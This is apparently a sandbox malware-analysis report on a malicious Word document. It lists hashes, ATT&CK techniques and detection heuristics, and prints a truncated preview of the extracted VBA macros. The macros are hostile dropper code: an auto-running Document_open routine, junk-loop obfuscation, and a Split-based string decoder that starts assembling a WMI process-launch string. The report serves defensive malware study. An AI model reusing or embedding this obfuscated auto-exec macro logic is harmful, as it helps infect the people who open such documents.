Office (OLE) malware analysis — malicious · 9451fd75c5e253d4

MALICIOUS

Office (OLE)

183.9 KB Created: 2019-12-20 12:41:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: ed77ea17fa28c1ce2cca9b36a744bf25 SHA-1: 6e584fa9486c45e8c45f042fc4ee029c4ee898eb SHA-256: 9451fd75c5e253d4197deabc5078487596a8d53f42e8bf907cbe53d598e2e089

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1047 WMI

The sample is a malicious Office document containing VBA macros. The 'Document_open' macro is present and configured to execute automatically, indicating an attempt to run malicious code upon opening the document. The GetObject call further suggests the execution of external code. While the VBA code is heavily obfuscated and truncated, its presence and auto-execution trigger are strong indicators of a downloader or dropper.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7499 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7499 bytes
SHA-256: `eae12ec0adca4893d56cd720a52715dc074a24e946bcb5d4d9a1f20894a9ea29`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Jepjwaaqaamz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Xmyaygmvtv, 0, 0, MSForms, TextBox" Private Sub Document_open() Ryohzngv = 234 + 423 Do While Xhxckjxv = 1 Hhdroptyujsb = 3 * Ivumncdtw Xhjrzfpq = ("Iste magni distinctio numquam illum quisquam quam minima.") For Kvwtjuibkjvf = Ppkhoqnlbrqi To Udclomxzx Hvslrfsr = ("Vero et aut unde.") Kvhcwhzt = 223 Next Bkbghhkq = Qrqehuvzklyqv Loop Kvbfglrzr Jmgfwvnge = 234 + 423 Do While Cmkdeuqcxtl = 1 Yxoerrunufh = 3 * Jibgxlvoqsr Hogfnxdqhzhj = ("Qui et eveniet.") For Eahhciplhar = Nbhewxvjfgorj To Biuwixrniloxg Goryqoavk = ("Repellat nihil rerum ab.") Eyusptrpjygu = 223 Next Vnysizpn = Azlblbnk Loop End Sub Attribute VB_Name = "Gsoknbun" Attribute VB_Base = "0{5FD7884A-141B-468D-BABB-0639DF734BE8}{B290731F-00E1-4FA7-85CC-84F998A45FA4}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Etceolpj" Function Vlptvrwkyy() Tfpksmuriti = 234 + 423 Do While Jmekulsyblx = 1 Upcpehgsggohg = 3 * Witvxpbtih Mqrtrrvre = ("Ab error.") For Pbtvdgqcnahc = Bvitwthtztco To Plsggpeudtxmr Gfoybqvnyhvlv = ("In ut omnis error.") Tpuuncibvcogs = 223 Next Jbdvsoopkfuxu = Eiteaisxru Loop Bgvsklceikepw = Jepjwaaqaamz.Xmyaygmvtv Uudhvnkk = 234 + 423 Do While Wrxapcubzix = 1 Eyowknzpti = 3 * Plztjpdrwiuwb Hrdqeajzjgqa = ("Ipsa.") For Xciafzqviq = Bnvervttsyqr To Gmqmsohizflw Emjnxlzveepv = ("Dolorem excepturi.") Qzmrikse = 223 Next Xeltoptvzcof = Tgvkilxw Loop Twuajgnimx = Bgvsklceikepw + Gsoknbun.Tpctrwvl + Gsoknbun.Lewhkjaenyppe + Gsoknbun.Wadciacihu Ecusarquyncxp = 234 + 423 Do While Kkxcplkcnt = 1 Rvhlzqym = 3 * Xohbktekmtoo Zufmuahyinzyr = ("Nisi eum tempora.") For Hrairmiv = Qychxpcu To Fllrbmzftb Chfbngjk = ("Deleniti doloribus dicta vel nesciunt voluptas.") Qldcerlxweiqx = 223 Next Igencbmpp = Bvcwkyufuaoz Loop Rwhsvasqayjvl = Twuajgnimx + Gsoknbun.Tfvsiusnj + Gsoknbun.Ffftzxhkpw.Tag Enipklatnxpcd = 234 + 423 Do While Nttkimexlzou = 1 Xbsqezaaah = 3 * Rekaeprtecd Kaqxpwqjk = ("Meredith") For Wlzeumtmosvzn = Ycyduxfjtzkc To Fghnodsqny Rzopacmuxn = ("Gina") Vyrcffkjh = 223 Next Molygchpz = Gfueyhqqmr Loop Vlptvrwkyy = Hhjaocxappmpa + Rwhsvasqayjvl + Hhjaocxappmpa Zbxoxwajrrwj = 234 + 423 Do While Kuemgzoapn = 1 Pgxvddgnhwc = 3 * Flesidafhl Gjcdzlkgigtlw = ("Natus iusto eum.") For Dufoskabnjhg = Jivgvwudk To Rnezsswukw Wzoghptr = ("Rerum.") Yyxxfary = 223 Next Weaxvcuqlm = Ygzggpnnqq Loop End Function Function Kvbfglrzr() Xdqrrexdtgv = 234 + 423 Do While Ikqcpoklgoao = 1 Jdynuecdb = 3 * Wwcypbefz Nsjbxcrpqc = ("Voluptatem blanditiis a totam enim voluptatem placeat impedit eveniet.") For Ozusbioejxwts = Qmwirizpge To Amlcduzoy Dxkubqvpjp = ("Quod consequatur.") Ctukooko = 223 Next Bosxutztto = Tkgoyzko Loop iwiwiiwiwjjsj = "__&888&^bBGks^@" Ibaqraws = 234 + 423 Do While Huaioubecliwm = 1 Lfatsftsxj = 3 Psidnzluiv Wskhesmocefvv = ("Provident repudiandae libero ut.") For Rncdzumlmtiu = Ddqtcwau To Fwfgkmmhogu Smdkgxovx = ("Recusandae.") Yapcsdtwboy = 223 Next Fbahbgpgwxx = Ltxxshgrhkxkp Loop Rnyaxlwhc = Split("__&888&^bBGks^@wi__&888&^bBGks^@nmg__&888&^b" + "BGks^@mts__&888&^bBGks^@:Wi__&8 ... (truncated)

SHA-256: eae12ec0adca4893d56cd720a52715dc074a24e946bcb5d4d9a1f20894a9ea29

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Jepjwaaqaamz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Xmyaygmvtv, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Ryohzngv = 234 + 423
   Do While Xhxckjxv = 1
      Hhdroptyujsb = 3 * Ivumncdtw
      Xhjrzfpq = ("Iste magni distinctio numquam illum quisquam quam minima.")
      For Kvwtjuibkjvf = Ppkhoqnlbrqi To Udclomxzx
         Hvslrfsr = ("Vero et aut unde.")
         Kvhcwhzt = 223
      Next
      Bkbghhkq = Qrqehuvzklyqv
Loop
Kvbfglrzr
   Jmgfwvnge = 234 + 423
   Do While Cmkdeuqcxtl = 1
      Yxoerrunufh = 3 * Jibgxlvoqsr
      Hogfnxdqhzhj = ("Qui et eveniet.")
      For Eahhciplhar = Nbhewxvjfgorj To Biuwixrniloxg
         Goryqoavk = ("Repellat nihil rerum ab.")
         Eyusptrpjygu = 223
      Next
      Vnysizpn = Azlblbnk
Loop
End Sub

Attribute VB_Name = "Gsoknbun"
Attribute VB_Base = "0{5FD7884A-141B-468D-BABB-0639DF734BE8}{B290731F-00E1-4FA7-85CC-84F998A45FA4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Etceolpj"
Function Vlptvrwkyy()
   Tfpksmuriti = 234 + 423
   Do While Jmekulsyblx = 1
      Upcpehgsggohg = 3 * Witvxpbtih
      Mqrtrrvre = ("Ab error.")
      For Pbtvdgqcnahc = Bvitwthtztco To Plsggpeudtxmr
         Gfoybqvnyhvlv = ("In ut omnis error.")
         Tpuuncibvcogs = 223
      Next
      Jbdvsoopkfuxu = Eiteaisxru
Loop
Bgvsklceikepw = Jepjwaaqaamz.Xmyaygmvtv
   Uudhvnkk = 234 + 423
   Do While Wrxapcubzix = 1
      Eyowknzpti = 3 * Plztjpdrwiuwb
      Hrdqeajzjgqa = ("Ipsa.")
      For Xciafzqviq = Bnvervttsyqr To Gmqmsohizflw
         Emjnxlzveepv = ("Dolorem excepturi.")
         Qzmrikse = 223
      Next
      Xeltoptvzcof = Tgvkilxw
Loop
Twuajgnimx = Bgvsklceikepw + Gsoknbun.Tpctrwvl + Gsoknbun.Lewhkjaenyppe + Gsoknbun.Wadciacihu
   Ecusarquyncxp = 234 + 423
   Do While Kkxcplkcnt = 1
      Rvhlzqym = 3 * Xohbktekmtoo
      Zufmuahyinzyr = ("Nisi eum tempora.")
      For Hrairmiv = Qychxpcu To Fllrbmzftb
         Chfbngjk = ("Deleniti doloribus dicta vel nesciunt voluptas.")
         Qldcerlxweiqx = 223
      Next
      Igencbmpp = Bvcwkyufuaoz
Loop
Rwhsvasqayjvl = Twuajgnimx + Gsoknbun.Tfvsiusnj + Gsoknbun.Ffftzxhkpw.Tag
   Enipklatnxpcd = 234 + 423
   Do While Nttkimexlzou = 1
      Xbsqezaaah = 3 * Rekaeprtecd
      Kaqxpwqjk = ("Meredith")
      For Wlzeumtmosvzn = Ycyduxfjtzkc To Fghnodsqny
         Rzopacmuxn = ("Gina")
         Vyrcffkjh = 223
      Next
      Molygchpz = Gfueyhqqmr
Loop
Vlptvrwkyy = Hhjaocxappmpa + Rwhsvasqayjvl + Hhjaocxappmpa
   Zbxoxwajrrwj = 234 + 423
   Do While Kuemgzoapn = 1
      Pgxvddgnhwc = 3 * Flesidafhl
      Gjcdzlkgigtlw = ("Natus iusto eum.")
      For Dufoskabnjhg = Jivgvwudk To Rnezsswukw
         Wzoghptr = ("Rerum.")
         Yyxxfary = 223
      Next
      Weaxvcuqlm = Ygzggpnnqq
Loop
End Function
Function Kvbfglrzr()
   Xdqrrexdtgv = 234 + 423
   Do While Ikqcpoklgoao = 1
      Jdynuecdb = 3 * Wwcypbefz
      Nsjbxcrpqc = ("Voluptatem blanditiis a totam enim voluptatem placeat impedit eveniet.")
      For Ozusbioejxwts = Qmwirizpge To Amlcduzoy
         Dxkubqvpjp = ("Quod consequatur.")
         Ctukooko = 223
      Next
      Bosxutztto = Tkgoyzko
Loop
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
   Ibaqraws = 234 + 423
   Do While Huaioubecliwm = 1
      Lfatsftsxj = 3 * Psidnzluiv
      Wskhesmocefvv = ("Provident repudiandae libero ut.")
      For Rncdzumlmtiu = Ddqtcwau To Fwfgkmmhogu
         Smdkgxovx = ("Recusandae.")
         Yapcsdtwboy = 223
      Next
      Fbahbgpgwxx = Ltxxshgrhkxkp
Loop
Rnyaxlwhc = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&8
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.